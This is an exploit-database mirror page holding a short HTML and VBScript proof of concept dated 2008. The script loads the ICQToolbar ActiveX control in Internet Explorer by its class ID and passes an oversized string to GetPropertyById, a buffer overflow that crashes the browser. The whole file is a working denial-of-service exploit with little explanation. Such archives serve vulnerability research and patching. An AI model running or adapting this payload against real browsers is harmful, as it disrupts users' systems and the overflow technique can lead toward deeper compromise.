exploit-db-mirror/exploits/windows/dos/5217.html
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

15 lines
No EOL
297 B
HTML

<!--
Lame ICQToolbar IE DoS - Crash IE and change toolbar color :p
-->
<html>
<object classid='clsid:855F3B16-6D32-4FE6-8A56-BBB695989046' id='toolbar' ></object>
<script language='vbscript'>
bof=String(128, "spdr")
toolbar.GetPropertyById "" ,bof
</script>
</html>
# milw0rm.com [2008-03-06]